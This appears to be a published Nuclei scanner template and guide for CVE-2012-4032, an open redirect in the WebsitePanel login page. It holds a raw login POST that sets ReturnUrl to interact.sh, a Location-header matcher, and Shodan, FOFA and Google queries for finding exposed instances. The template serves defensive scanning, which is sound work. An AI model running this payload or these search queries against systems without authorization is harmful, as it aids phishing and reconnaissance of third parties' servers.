WebsitePanel before v1.2.2.1 - Open Redirect

ID: CVE-2012-4032

Severity: medium

Author: ctflearner

Tags: cve,cve2012,packetstorm,redirect,websitepanel,authenticated

Description

Open redirect vulnerability in the login page in WebsitePanel before 1.2.2.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in ReturnUrl to Default.aspx

YAML Source

id: CVE-2012-4032

info:
  name: WebsitePanel before v1.2.2.1 - Open Redirect
  author: ctflearner
  severity: medium
  description: |
    Open redirect vulnerability in the login page in WebsitePanel before 1.2.2.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in ReturnUrl to Default.aspx
  impact: |
    An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or further exploitation.
  remediation: |
    Upgrade to WebsitePanel v1.2.2.1 or later to fix the open redirect vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2012-4032
    - https://www.exploit-db.com/exploits/37488
    - https://packetstormsecurity.com/files/114541/WebsitePanel-CMS-Open-Redirect.html
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/76803
    - http://websitepanel.codeplex.com/workitem/224
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N
    cvss-score: 5.8
    cve-id: CVE-2012-4032
    cwe-id: CWE-20
    epss-score: 0.00951
    epss-percentile: 0.81499
    cpe: cpe:2.3:a:websitepanel:websitepanel:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: websitepanel
    product: websitepanel
    shodan-query:
      - title:"WebsitePanel" html:"login"
      - http.title:"websitepanel" html:"login"
    fofa-query: title="websitepanel" html:"login"
    google-query: intitle:"websitepanel" html:"login"
  tags: cve,cve2012,packetstorm,redirect,websitepanel,authenticated

http:
  - raw:
      - |
        POST /Default.aspx?pid=Login&ReturnUrl=http%3A%2F%2Fwww.interact.sh HTTP/1.1
        Host: {{Hostname}}
        Cookie: UserCulture=en-US; .WEBSITEPANELPORTALAUTHASPX=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
        Content-Type: application/x-www-form-urlencoded

        ctl03%24ctl01%24ctl00%24txtUsername={{username}}&ctl03%24ctl01%24ctl00%24txtPassword={{password}}&ctl03%24ctl01%24ctl00%24btnLogin=+++Sign+In+++&ctl03%24ctl01%24ctl00%24ddlLanguage=en-US&ctl03%24ctl01%24ctl00%24ddlTheme=Default

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:http?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
# digest: 490a004630440220393d0f142b819784d850c9851c4fc3fcc1fc0117e7e3f913f40f0fdd384aa52f022027239f2438f094d4837bb30b28c8ce2a9b0c6342e78c9f304e818bd6749eac0b:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2012/CVE-2012-4032.yaml"

View on Github